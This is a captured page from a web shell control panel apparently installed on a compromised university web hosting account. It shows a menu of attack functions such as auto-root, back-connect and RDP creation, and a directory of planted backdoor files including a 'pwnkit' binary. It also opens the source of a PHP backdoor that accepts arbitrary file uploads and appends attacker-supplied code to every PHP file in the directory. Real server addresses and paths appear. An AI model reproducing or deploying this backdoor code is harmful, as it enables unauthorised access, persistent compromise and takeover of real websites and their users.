Linux server1.rielles.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 68.183.224.113 | : 18.116.235.193
40 Domain
8.2.24
ccsit
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ccsit /
public_html /
student /
tjolaco /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
SYS_CONFIG
[ DIR ]
drwxr-xr-x
sym_conf
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
2749173a96e9c0ba2090c7eee3c114...
198.8
KB
-rw-r--r--
gecko.php
68.74
KB
-rw-r--r--
hades.php
2.01
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sym.php
4.89
KB
-rw-r--r--
szckeaau.php
760
B
-rw-r--r--
ybobqzfy.php
760
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : szckeaau.php
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
Close